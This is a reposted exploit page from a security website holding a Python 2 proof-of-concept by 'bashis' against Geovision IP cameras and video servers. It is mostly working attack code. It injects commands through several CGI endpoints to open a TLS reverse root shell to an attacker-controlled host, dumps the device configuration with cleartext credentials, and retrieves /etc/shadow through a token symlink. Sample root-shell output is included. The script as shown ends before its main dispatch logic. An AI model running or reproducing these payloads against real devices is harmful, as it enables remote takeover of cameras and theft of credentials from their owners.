首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Geovision Inc. IP Camera & Video - Remote Command Execution
来源:mcw noemail eu 作者:bashis 发布时间:2018-02-08  
#!/usr/bin/env python2.7
#
# [SOF]
#
# Geovision Inc. IP Camera & Video Server Remote Command Execution PoC
# Researcher: bashis <mcw noemail eu> (November 2017)
#
###########################################################################################
#
# 1. Pop stunnel TLSv1 reverse root shell [Local listener: 'ncat -vlp <LPORT> --ssl'; Verified w/ v7.60]
# 2. Dump all settings of remote IPC with Login/Passwd in cleartext
# Using:
# - CGI: 'Usersetting.cgi' (Logged in user) < v3.12 (Very old) [Used as default]
# - CGI: 'FilterSetting.cgi' (Logged in user) < v3.12 (Very old)
# - CGI: 'PictureCatch.cgi' (Anonymous) > v3.10
# - CGI: 'JpegStream.cgi' (Anonymous) > v3.10
# 3. GeoToken PoC to login and download /etc/shadow via generated token symlink
#
# Sample reverse shell:
# $ ncat -vlp 1337 --ssl
# Ncat: Version 7.60 ( https://nmap.org/ncat )
# Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
# Ncat: SHA-1 fingerprint: 3469 C118 43F0 043A 5168 189B 1D67 1131 4B5B 1603
# Ncat: Listening on :::1337
# Ncat: Listening on 0.0.0.0:1337
# Ncat: Connection from 192.168.57.20.
# Ncat: Connection from 192.168.57.20:16945.
# /bin/sh: can't access tty; job control turned off
# /www # id
# id
# uid=0(root) gid=0(root)
# /www # uname -a
# uname -a
# Linux IPCAM 2.6.18_pro500-davinci #1 Mon Jun 19 21:27:10 CST 2017 armv5tejl unknown
# /www # exit
# $
 
############################################################################################
 
import sys
import socket
import urllib, urllib2, httplib
import json
import hashlib
import commentjson # pip install commentjson
import xmltodict # pip install xmltodict
import select
import string
import argparse
import random
import base64
import ssl
import json
import os
import re
 
#from pwn import *
 
def split2len(s, n):
    def _f(s, n):
        while s:
            yield s[:n]
            s = s[n:]
    return list(_f(s, n))
 
# Ignore download of '302 Found/Location' redirections
class NoRedirection(urllib2.HTTPErrorProcessor):
 
    def http_response(self, request, response):
        return response
    https_response = http_response
 
class HTTPconnect:
 
    def __init__(self, host, proto, verbose, credentials, Raw, noexploit):
        self.host = host
        self.proto = proto
        self.verbose = verbose
        self.credentials = credentials
        self.Raw = Raw
        self.noexploit = False
        self.noexploit = noexploit
    
    def Send(self, uri, query_headers, query_data, ID):
        self.uri = uri
        self.query_headers = query_headers
        self.query_data = query_data
        self.ID = ID
 
        # Connect-timeout in seconds
        timeout = 10
        socket.setdefaulttimeout(timeout)
 
        url = '{}://{}{}'.format(self.proto, self.host, self.uri)
 
        if self.verbose:
            print "[Verbose] Sending:", url
 
        if self.proto == 'https':
            if hasattr(ssl, '_create_unverified_context'):
                print "[i] Creating SSL Unverified Context"
                ssl._create_default_https_context = ssl._create_unverified_context
 
        if self.credentials:
            Basic_Auth = self.credentials.split(':')
            if self.verbose:
                print "[Verbose] User:",Basic_Auth[0],"password:",Basic_Auth[1]
            try:
                pwd_mgr = urllib2.HTTPpasswordMgrWithDefaultDahua_realm()
                pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
                auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
                if verbose:
                    http_logger = urllib2.HTTPHandler(debuglevel = 1) # HTTPSHandler... for HTTPS
                    opener = urllib2.build_opener(auth_handler,NoRedirection,http_logger)
                else:
                    opener = urllib2.build_opener(auth_handler,NoRedirection)
                urllib2.install_opener(opener)
            except Exception as e:
                print "[!] Basic Auth Error:",e
                sys.exit(1)
        else:
            # Don't follow redirects!
            if verbose:
                http_logger = urllib2.HTTPHandler(debuglevel = 1)
                opener = urllib2.build_opener(http_logger,NoRedirection)
                urllib2.install_opener(opener)
            else:
                NoRedir = urllib2.build_opener(NoRedirection)
                urllib2.install_opener(NoRedir)
 
 
        if self.noexploit and not self.verbose:
            print "[<] 204 Not Sending!"
            html =  "Not sending any data"
            return html
        else:
            if self.query_data:
                req = urllib2.Request(url, data=urllib.urlencode(self.query_data,doseq=True), headers=self.query_headers)
                if self.ID:
                    Cookie = 'CLIENT_ID={}'.format(self.ID)
                    req.add_header('Cookie', Cookie)
            else:
                req = urllib2.Request(url, None, headers=self.query_headers)
                if self.ID:
                    Cookie = 'CLIENT_ID={}'.format(self.ID)
                    req.add_header('Cookie', Cookie)
            rsp = urllib2.urlopen(req)
            if rsp:
                print "[<] {}".format(rsp.code)
 
        if self.Raw:
            return rsp
        else:
            html = rsp.read()
            return html
 
 
 
#
# Validate correctness of HOST, IP and PORT
#
class Validate:
 
    def __init__(self,verbose):
        self.verbose = verbose
 
    # Check if IP is valid
    def CheckIP(self,IP):
        self.IP = IP
 
        ip = self.IP.split('.')
        if len(ip) != 4:
            return False
        for tmp in ip:
            if not tmp.isdigit():
                return False
            i = int(tmp)
            if i < 0 or i > 255:
                return False
        return True
 
    # Check if PORT is valid
    def Port(self,PORT):
        self.PORT = PORT
 
        if int(self.PORT) < 1 or int(self.PORT) > 65535:
            return False
        else:
            return True
 
    # Check if HOST is valid
    def Host(self,HOST):
        self.HOST = HOST
 
        try:
            # Check valid IP
            socket.inet_aton(self.HOST) # Will generate exeption if we try with DNS or invalid IP
            # Now we check if it is correct typed IP
            if self.CheckIP(self.HOST):
                return self.HOST
            else:
                return False
        except socket.error as e:
            # Else check valid DNS name, and use the IP address
            try:
                self.HOST = socket.gethostbyname(self.HOST)
                return self.HOST
            except socket.error as e:
                return False
 
 
 
class Geovision:
 
    def __init__(self, rhost, proto, verbose, credentials, raw_request, noexploit, headers, SessionID):
        self.rhost = rhost
        self.proto = proto
        self.verbose = verbose
        self.credentials = credentials
        self.raw_request = raw_request
        self.noexploit = noexploit
        self.headers = headers
        self.SessionID = SessionID
 
 
    def Login(self):
 
        try:
 
            print "[>] Requesting keys from remote"
            URI = '/ssi.cgi/Login.htm'
            response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,None,None)
            response = response.read()[:1500]
            response = re.split('[()<>?"\n_&;/ ]',response)
    #       print response
 
        except Exception as e:
            print "[!] Can't access remote host... ({})".format(e)
            sys.exit(1)
 
        try:
            #
            # Geovision way to have MD5 random Login and Password
            #
            CC1 = ''
            CC2 = ''
            for check in range(0,len(response)):
                if response[check] == 'cc1=':
                    CC1 = response[check+1]
                    print "[i] Random key CC1: {}".format(response[check+1])
                elif response[check] == 'cc2=':
                    CC2 = response[check+1]
                    print "[i] Random key CC2: {}".format(response[check+1])
                """
                #
                # Less interesting to know, but leave it here anyway.
                #
                # If the remote server has enabled guest view, these below will not be '0'
                elif response[check] == 'GuestIdentify':
                    print "[i] GuestIdentify: {}".format(response[check+2])
                elif response[check] == 'uid':
                    if response[check+2]:
                        print "[i] uid: {}".format(response[check+2])
                    else:
                        print "[i] uid: {}".format(response[check+3])
                elif response[check] == 'pid':
                    if response[check+2]:
                        print "[i] pid: {}".format(response[check+2])
                    else:
                        print "[i] pid: {}".format(response[check+3])
                """
 
            if not CC1 and not CC2:
                print "[!] CC1 and CC2 missing!"
                print "[!] Cannot generate MD5, exiting.."
                sys.exit(0)
 
            #
            # Geovision MD5 Format
            #
            uMD5 = hashlib.md5(CC1 + username + CC2).hexdigest().upper()
            pMD5 = hashlib.md5(CC2 + password + CC1).hexdigest().upper()
    #       print "[i] User MD5: {}".format(uMD5)
    #       print "[i] Pass MD5: {}".format(pMD5)
 
 
            self.query_args = {
                "username":"",
                "password":"",
                "Apply":"Apply",
                "umd5":uMD5,
                "pmd5":pMD5,
                "browser":1,
                "is_check_OCX_OK":0
                }
 
            print "[>] Logging in"
            URI = '/LoginPC.cgi'
            response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
    #       print response.info()
 
            # if we don't get 'Set-Cookie' back from the server, the Login has failed
            if not (response.info().get('Set-Cookie')):
                print "[!] Login Failed!"
                sys.exit(1)
            if verbose:
                print "Cookie: {}".format(response.info().get('Set-Cookie'))
 
            return response.info().get('Set-Cookie')
 
        except Exception as e:
            print "[i] What happen? ({})".format(e)
            exit(0)
 
 
    def DeviceInfo(self):
 
        try:
            URI = '/PSIA/System/deviceInfo'
            response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,None,None)
            deviceinfo = xmltodict.parse(response)
            print "[i] Remote target: {} ({})".format(deviceinfo['DeviceInfo']['model'],deviceinfo['DeviceInfo']['firmwareVersion'])
            return True
 
        except Exception as e:
            print "[i] Info about remote target failed ({})".format(e)
            return False
 
 
    def UserSetting(self,DumpSettings):
        self.DumpSettings = DumpSettings
 
        if self.DumpSettings:
            print "[i] Dump Config of remote"
            SH_CMD = '`echo "<!--#include file="SYS_CFG"-->" >/var/www/tmp/Login.htm`'
        else:
 
            print "[i] Launching TLSv1 privacy reverse shell"
            self.headers = {
                'Connection': 'close',
                'Accept-Language'   :   'en-US,en;q=0.8',
                'Cache-Control' :   'max-age=0',
                'User-Agent':'Mozilla',
                'Accept':'client=yes\\x0apty=yes\\x0asslVersion=TLSv1\\x0aexec=/bin/sh\\x0a'
                }
            SH_CMD = ';echo -en \"$HTTP_ACCEPT connect=LHOST:LPORT\"|stunnel -fd 0;'
            SH_CMD = SH_CMD.replace("LHOST",lhost)
            SH_CMD = SH_CMD.replace("LPORT",lport)
 
        print "[>] Pwning Usersetting.cgi"
        self.query_args = {
            "umd5":SH_CMD,
            "pmd5":"GEOVISION",
            "nmd5":"PWNED",
            "cnt5":"",
            "username":"",
            "passwordOld":"",
            "passwordNew":"",
            "passwordRetype":"",
            "btnSubmitAdmin":"1",
            "submit":"Apply"
            }
        try:
            URI = '/UserSetting.cgi'
            response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
            if DumpSettings:
                print "[i] Dumping"
                URI = '/ssi.cgi/tmp/Login.htm'
                response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,None,self.SessionID)
                print response
                return True
 
        except Exception as e:
            if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
                print "[!] Enjoy the shell... ({})".format(e)
                return True
 
 
    def PictureCatch(self,DumpSettings):
        self.DumpSettings = DumpSettings
 
        if self.DumpSettings:
            print "[i] Dump Config of remote"
            SH_CMD = '`echo "<!--#include file="SYS_CFG"-->" >/var/www/tmp/Login.htm`'
        else:
 
            print "[i] Launching TLSv1 privacy reverse shell"
            self.headers = {
                'Connection': 'close',
                'Accept-Language'   :   'en-US,en;q=0.8',
                'Cache-Control' :   'max-age=0',
                'User-Agent':'Mozilla',
                'Accept':'client=yes\\x0apty=yes\\x0asslVersion=TLSv1\\x0aexec=/bin/sh\\x0a'
                }
            SH_CMD = ';echo -en \"$HTTP_ACCEPT connect=LHOST:LPORT\"|stunnel -fd 0;'
            SH_CMD = SH_CMD.replace("LHOST",lhost)
            SH_CMD = SH_CMD.replace("LPORT",lport)
 
        print "[>] Pwning PictureCatch.cgi"
        self.query_args = {
            "username":SH_CMD,
            "password":"GEOVISION",
            "attachment":"1",
            "channel":"1",
            "secret":"1",
            "key":"PWNED"
            }
 
        try:
            URI = '/PictureCatch.cgi'
            response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
            if DumpSettings:
                print "[i] Dumping"
                URI = '/ssi.cgi/tmp/Login.htm'
                response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,None,self.SessionID)
                print response
                return True
        except Exception as e:
            if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
                print "[!] Enjoy the shell... ({})".format(e)
                return True
 
 
    def JpegStream(self,DumpSettings):
        self.DumpSettings = DumpSettings
 
        if self.DumpSettings:
            print "[i] Dump Config of remote"
            SH_CMD = '`echo "<!--#include file="SYS_CFG"-->" >/var/www/tmp/Login.htm`'
        else:
 
            print "[i] Launching TLSv1 privacy reverse shell"
            self.headers = {
                'Connection': 'close',
                'Accept-Language'   :   'en-US,en;q=0.8',
                'Cache-Control' :   'max-age=0',
                'User-Agent':'Mozilla',
                'Accept':'client=yes\\x0apty=yes\\x0asslVersion=TLSv1\\x0aexec=/bin/sh\\x0a'
                }
            SH_CMD = ';echo -en \"$HTTP_ACCEPT connect=LHOST:LPORT\"|stunnel -fd 0;'
            SH_CMD = SH_CMD.replace("LHOST",lhost)
            SH_CMD = SH_CMD.replace("LPORT",lport)
 
        print "[>] Pwning JpegStream.cgi"
        self.query_args = {
            "username":SH_CMD,
            "password":"GEOVISION",
            "attachment":"1",
            "channel":"1",
            "secret":"1",
            "key":"PWNED"
            }
 
        try:
            URI = '/JpegStream.cgi'
            response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
            if DumpSettings:
                print "[i] Dumping"
                URI = '/ssi.cgi/tmp/Login.htm'
                response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,None,self.SessionID)
                print response
                return True
        except Exception as e:
            if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
                print "[!] Enjoy the shell... ({})".format(e)
                return True
 
#
# Interesting example of bad code and insufficent sanitation of user input.
# ';' is filtered in v3.12, and when found in the packet, the packet is simply ignored.
#
# Later in the chain the Geovision code will write provided userinput to flash, we may overwrite unwanted flash area if we playing to much here.
# So, we are limited to 31 char per line (32 MUST BE NULL), to play safe game with this bug.
#
# v3.10->3.12 changed how to handle ipfilter
# From:
# User input to system() call in FilterSetting.cgi to set iptable rules and then save them in flash
# To:
# User input transferred from 'FilterSetting.cgi' to flash (/dev/mtd11), and when the tickbox to activate the filter rules,
# '/usr/local/bin/geobox-iptables-reload' is triggered to read these rules from flash and '/usr/local/bin/iptables' via 'geo_net_filter_table_add'
# with system() call in 'libgeo_net.so'
#
 
# Should end up into;
# 23835 root        576 S   sh -c /usr/local/bin/iptables -A INPUT  -s `/usr/loca...[trunkated]
# 23836 root       2428 S   /usr/local/bin/stunnel /tmp/x
# 23837 root        824 S   /bin/sh
 
 
    def FilterSetting(self):
 
        try:
            print "[>] Pwning FilterSetting.cgi"
            #
            # ';' will be treated by the code as LF
            #
            # Let's use some TLSv1 privacy for the reverse shell
            #
            SH_CMD = 'client=yes;connect=LHOST:LPORT;exec=/bin/sh;pty=yes;sslVersion=TLSv1'
            #
            SH_CMD = SH_CMD.replace("LHOST",lhost)
            SH_CMD = SH_CMD.replace("LPORT",lport)
            ShDict = SH_CMD.split(';')
 
            MAX_SIZE = 31 # Max Size of the strings to generate
            LF = 0
            LINE = 0
            CMD = {}
            CMD_NO_LF = "`echo -n \"TMP\">>/tmp/x`"
            CMD_DO_LF = "`echo \"TMP\">>/tmp/x`"
            SIZE = MAX_SIZE-(len(CMD_NO_LF)-3) # Size of availible space for our input in 'SH_CMD'
 
            # Remove, just in case
            CMD[LINE] = "`rm -f /tmp/x`"
 
            URI = '/FilterSetting.cgi'
            #
            # This loop will make the correct aligment of user input
            #
            for cmd in range(0,len(ShDict)):
                CMD_LF = math.ceil(float(len(ShDict[cmd])) / SIZE)
                cmd_split = split2len(ShDict[cmd], SIZE)
                for CMD_LEN in range(0,len(cmd_split)):
                    LINE += 1
                    LF += 1
                    if (len(cmd_split[CMD_LEN]) > SIZE-1) and (CMD_LF != LF):
                        CMD[LINE] = CMD_NO_LF.replace("TMP",cmd_split[CMD_LEN])
                    else:
                        CMD[LINE] = CMD_DO_LF.replace("TMP",cmd_split[CMD_LEN])
                        LF = 0
                    if verbose:
                        print "Len: {} {}".format(len(CMD[LINE]),CMD[LINE])
 
            # Add two more commands to execute stunnel and remove /tmp/x
            CMD[LINE+1] = "`/usr/local/bin/stunnel /tmp/x`" # 31 char, no /usr/local/bin in $PATH
            CMD[LINE+2] = "`rm -f /tmp/x`" # Some bug here, think it is timing as below working
            CMD[LINE+3] = "`rm -f /tmp/x`" # Working, this is only one more add/enable/disable/remove loop
#
# Below while() loop will create following /tmp/x, execute 'stunnel' and remove /tmp/x
#
# client=yes
# connect=<LHOST>:<LPORT>
# exec=/bin/sh
# pty=yes
# sslVersion=TLSv1
#
 
            NEW_IP_FILTER = 1 # > v3.12
            CMD_LEN = 0
            who = 0
            # Clean up to make room, just in case
            for Remove in range(0,4):
                print "[>] Cleaning ipfilter entry: {}".format(Remove+1)
                self.query_args = {
                    "bPolicy":"0",      # 1 = Enable, 0 = Disable
                    "Delete":"Remove",  # Remove entry
                    "szIpAddr":"",
                    "byOpId":"0",       # 0 = Allow, 1 = Deny
                    "dwSelIndex":"0",
                    }
                response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
 
            while True:
                if who == len(CMD):
                    break
                if CMD_LEN < 4:
 
                    print "[>] Sending: {} ({})".format(CMD[who],len(CMD[who]))
                    self.query_args = {
                        "szIpAddr":CMD[who], # 31 char limit
                        "byOpId":"0", # 0 = Allow, 1 = Deny
                        "dwSelIndex":"0", # Seems not to be in use
                        "Add":"Apply"
                        }
                    response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
                    response = re.split('[()<>?"\n_&;/ ]',response)
                    print response
                    if NEW_IP_FILTER:
                        for cnt in range(0,len(response)):
                            if response[cnt] == 'iptables':
                                NEW_IP_FILTER = 0
                                print "[i] Remote don't need Enable/Disable"
                                break
                    CMD_LEN += 1
                    who += 1
                    time.sleep(2) # Seems to be too fast without
                # NEW Way
                elif NEW_IP_FILTER:
                    print "[>] Enabling ipfilter"
                    self.query_args = {
                        "bPolicy":"1", # 1 = Enable, 0 = Disable
                        "szIpAddr":"",
                        "byOpId":"0", # 0 = Allow, 1 = Deny
                        "dwSelIndex":"0",
                        }
 
                    response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
 
                    print "[i] Sleeping..."
                    time.sleep(5)
 
                    print "[>] Disabling ipfilter"
                    self.query_args = {
                        "szIpAddr":"",
                        "byOpId":"0",
                        "dwSelIndex":"0",
                        }
                    response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
 
                    for Remove in range(0,4):
                        print "[>] Deleting ipfilter Entry: {}".format(Remove+1)
                        self.query_args = {
                            "bPolicy":"0", # 1 = Enable, 0 = Disable
                            "Delete":"Remove",
                            "szIpAddr":"",
                            "byOpId":"0",
                            "dwSelIndex":"0",
                            }
                        response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
                    CMD_LEN = 0
                # OLD Way
                else:
                    for Remove in range(0,4):
                        print "[>] Deleting ipfilter Entry: {}".format(Remove+1)
                        self.query_args = {
                            "bPolicy":"0", # 1 = Enable, 0 = Disable
                            "Delete":"Remove",
                            "szIpAddr":"",
                            "byOpId":"0",
                            "dwSelIndex":"0",
                            }
                        response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
                    CMD_LEN = 0
 
            if NEW_IP_FILTER:
                print "[i] Last sending"
                print "[>] Enabling ipfilter"
                self.query_args = {
                    "bPolicy":"1", # 1 = Enable, 0 = Disable
                    "szIpAddr":"",
                    "byOpId":"0", # 0 = Allow, 1 = Deny
                    "dwSelIndex":"0",
                    }
 
                response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
 
                print "[i] Sleeping..."
                time.sleep(5)
 
                print "[>] Disabling ipfilter"
                self.query_args = {
                    "szIpAddr":"",
                    "byOpId":"0",
                    "dwSelIndex":"0",
                    }
                response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
 
                for Remove in range(0,4):
                    print "[>] Deleting ipfilter Entry: {}".format(Remove+1)
                    self.query_args = {
                        "bPolicy":"0", # 1 = Enable, 0 = Disable
                        "Delete":"Remove",
                        "szIpAddr":"",
                        "byOpId":"0",
                        "dwSelIndex":"0",
                        }
                    response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
            
            print "[!] Enjoy the shell... "
 
            return True
 
        except Exception as e:
 
            if not NEW_IP_FILTER:
                print "[i] Last sending"
                for Remove in range(0,4):
                    print "[>] Deleting ipfilter Entry: {}".format(Remove+1)
                    self.query_args = {
                        "bPolicy":"0", # 1 = Enable, 0 = Disable
                        "Delete":"Remove",
                        "szIpAddr":"",
                        "byOpId":"0",
                        "dwSelIndex":"0",
                        }
                    response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
                print "[!] Enjoy the shell... "
                return True
 
            print "[!] Hmm... {}".format(e)
            print response.read()
            return True
 
 
    def GeoToken(self):
 
        print "[i] GeoToken PoC to login and download /etc/shadow via token symlink"
        print "[!] You must have valid login and password to generate the symlink"
        try:
 
#########################################################################################
# This is how to list remote *.wav and *.avi files in /storage.
 
            """
            print "[>] Requesting token1"
            URI = '/BKCmdToken.php'
            response = HTTPconnect(rhost,proto,verbose,credentials,raw_request,noexploit).Send(URI,headers,None,None)
            result = json.load(response)
            if verbose:
                print json.dumps(result,sort_keys=True,indent=4, separators=(',', ': '))
 
            print "[i] Request OK?: {}".format(result['success'])
            if not result['success']:
                sys.exit(1)
            token1 = result['token']
 
#
# SAMPLE OUTPUT
#
#{
#    "success": true,
#    "token": "6fe1a7c1f34431acc7eaecba646b7caf"
#}
#
            # Generate correct MD5 token2
            token2 = hashlib.md5(hashlib.md5(token1 + 'gEo').hexdigest() + 'vIsIon').hexdigest()
            query_args = {
                "token1":token1,
                "token2":token2
                }
 
            print "[>] List files"
            URI = '/BKFileList.php'
            response = HTTPconnect(rhost,proto,verbose,credentials,raw_request,noexploit).Send(URI,headers,query_args,None)
            result = json.load(response)
            if verbose:
                print json.dumps(result,sort_keys=True,indent=4, separators=(',', ': '))
 
            for who in result.keys():
                print len(who)
#
# SAMPLE OUTPUT
#
#{
#    "files": [
#        {
#            "file_size": "2904170",
#            "filename": "event20171105104946001.avi",
#            "remote_path": "/storage/hd11-1/GV-MFD1501-0a99a9/cam01/2017/11/05"
#        },
#        {}
#    ]
#}
#########################################################################################
            """
 
            # Request remote MD5 token1
            print "[>] Requesting token1"
            URI = '/BKCmdToken.php'
            response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,None,None)
            result = json.load(response)
            if verbose:
                print json.dumps(result,sort_keys=True,indent=4, separators=(',', ': '))
 
            print "[i] Request OK?: {}".format(result['success'])
            if not result['success']:
                return False
            token1 = result['token']
#
# SAMPLE OUTPUT
#{
#    "success": true,
#    "token": "6fe1a7c1f34431acc7eaecba646b7caf"
#}
#
            #
            # Generate correct MD5 token2
            #
            # MD5 Format: <login>:<token1>:<password>
            #
            token2 = hashlib.md5(username + ':' + token1 + ':' + password).hexdigest()
 
            #
            # symlink this file for us
            #
            filename = '/etc/shadow'
 
            self.query_args = {
                "token1":token1,
                "token2":token2,
                "filename":filename
                }
 
            print "[>] Requesting download file link"
            URI = '/BKDownloadLink.cgi'
            response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,None)
            response = response.read()#[:900]
            response = response.replace("'", "\"")
            result = json.loads(response)
            print "[i] Request OK?: {}".format(result['success'])
            if not result['success']:
                return False
            if verbose:
                print json.dumps(result,sort_keys=True,indent=4, separators=(',', ': '))
 
 
#
# SAMPLE OUTPUT
#
#{
#    "dl_folder": "/tmp",
#    "dl_token": "C71689493825787.dltoken",
#    "err_code": 0,
#    "success": true
#}
#
 
            URI = '/ssi.cgi' + result['dl_folder'] + '/' + result['dl_token']
 
            print "[>] downloading ({}) with ({})".format(filename,URI)
            response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,None)
            response = response.read()
            print response
            return True
 
        except Exception as e:
            print "[i] GEO Token fail ({})".format(e)
            return False
 
 
if __name__ == '__main__':
 
#
# Help, info and pre-defined values
#  
    INFO =  '[Geovision Inc. IPC/IPV RCE PoCs (2017 bashis <mcw noemail eu>)]\n'
    HTTP = "http"
    HTTPS = "https"
    proto = HTTP
    verbose = False
    noexploit = False
    raw_request = True
    rhost = '192.168.57.20' # Default Remote HOST
    rport = '80'            # Default Remote PORT
    lhost = '192.168.57.1'  # Default Local HOST
    lport = '1337'      # Default Local PORT
#   creds = 'root:pass'
    credentials = False
 
#
# Geovision stuff
#
    SessionID =  str(int(random.random() * 100000))
    DumpSettings = False
    deviceinfo = False
    GEOtoken = False
    anonymous = False
    filtersetting = False
    usersetting = False
    jpegstream = False
    picturecatch = False
    # Geovision default
    username = 'admin'
    password = 'admin'
 

# Try to parse all arguments
#
    try:
        arg_parser = argparse.ArgumentParser(
        prog=sys.argv[0],
                description=('[*] '+ INFO +' [*]'))
        arg_parser.add_argument('--rhost', required=True, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
        arg_parser.add_argument('--rport', required=True, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')
        arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']')
        arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']')
        arg_parser.add_argument('--autoip', required=False, default=False, action='store_true', help='Detect External Connect Back IP [Default: False]')
 
        arg_parser.add_argument('--deviceinfo', required=False, default=False, action='store_true', help='Request model and firmware version')
 
        arg_parser.add_argument('-g','--geotoken', required=False, default=False, action='store_true', help='Try retrieve /etc/shadow with geotoken')
        arg_parser.add_argument('-a','--anonymous', required=False, default=False, action='store_true', help='Try pwning as anonymous')
        arg_parser.add_argument('-f','--filtersetting', required=False, default=False, action='store_true', help='Try pwning with FilterSetting.cgi')
        arg_parser.add_argument('-p','--picturecatch', required=False, default=False, action='store_true', help='Try pwning with PictureCatch.cgi')
        arg_parser.add_argument('-j','--jpegstream', required=False, default=False, action='store_true', help='Try pwning with JpegStream.cgi')
        arg_parser.add_argument('-u','--usersetting', required=False, default=False, action='store_true', help='Try pwning with UserSetting.cgi')
        arg_parser.add_argument('-d','--dump', required=False, default=False, action='store_true', help='Try pwning remote config')
 
 
        arg_parser.add_argument('--username', required=False, help='Username [Default: '+ username +']')
        arg_parser.add_argument('--password', required=False, help='password [Default: '+ password +']')
        if credentials:
            arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ credentials + ']')
        arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')
        arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')
        arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]')
        args = arg_parser.parse_args()
    except Exception as e:
        print INFO,"\nError: {}\n".format(str(e))
        sys.exit(1)
 
    print "\n[*]",INFO
 
    if args.verbose:
        verbose = args.verbose
#
# Check validity, update if needed, of provided options
#
    if args.https:
        proto = HTTPS
        if not args.rport:
            rport = '443'
 
    if credentials and args.auth:
        credentials = args.auth
 
    if args.geotoken:
        GEOtoken = args.geotoken
 
    if args.anonymous:
        anonymous = True
 
    if args.deviceinfo:
        deviceinfo = True
 
    if args.dump:
        DumpSettings = True
 
    if args.filtersetting:
        FilterSetting = True
 
    if args.usersetting:
        usersetting = True
 
    if args.jpegstream:
        jpegstream = True
 
    if args.picturecatch:
        picturecatch = True
 
    if args.username:
        username = args.username
 
    if args.password:
        password = args.password
 
    if args.noexploit:
        noexploit = args.noexploit
 
    if args.rport:
        rport = args.rport
 
    if args.rhost:
        rhost = args.rhost
        IP = args.rhost
 
    if args.lport:
        lport = args.lport
 
    if args.lhost:
        lhost = args.lhost
    elif args.autoip:
        # HTTP check of our external IP
        try:
 
            headers = {
                'Connection': 'close',
                'Accept'    :   'gzip, deflate',
                'Accept-Language'   :   'en-US,en;q=0.8',
                'Cache-Control' :   'max-age=0',
                'User-Agent':'Mozilla'
                }
 
            print "[>] Trying to find out my external IP"
            lhost = HTTPconnect("whatismyip.akamai.com",proto,verbose,credentials,False,noexploit).Send("/",headers,None,None)
            if verbose:
                print "[Verbose] Detected my external IP:",lhost
        except Exception as e:
            print "[<] ",e
            sys.exit(1)
 
    # Check if RPORT is valid
    if not Validate(verbose).Port(rport):
        print "[!] Invalid RPORT - Choose between 1 and 65535"
        sys.exit(1)
 
    # Check if RHOST is valid IP or FQDN, get IP back
    rhost = Validate(verbose).Host(rhost)
    if not rhost:
        print "[!] Invalid RHOST"
        sys.exit(1)
 
    # Check if LHOST is valid IP or FQDN, get IP back
    lhost = Validate(verbose).Host(lhost)
    if not lhost:
        print "[!] Invalid LHOST"
        sys.exit(1)
 
    # Check if RHOST is valid IP or FQDN, get IP back
    rhost = Validate(verbose).Host(rhost)
    if not rhost:
        print "[!] Invalid RHOST"
        sys.exit(1)
 
 
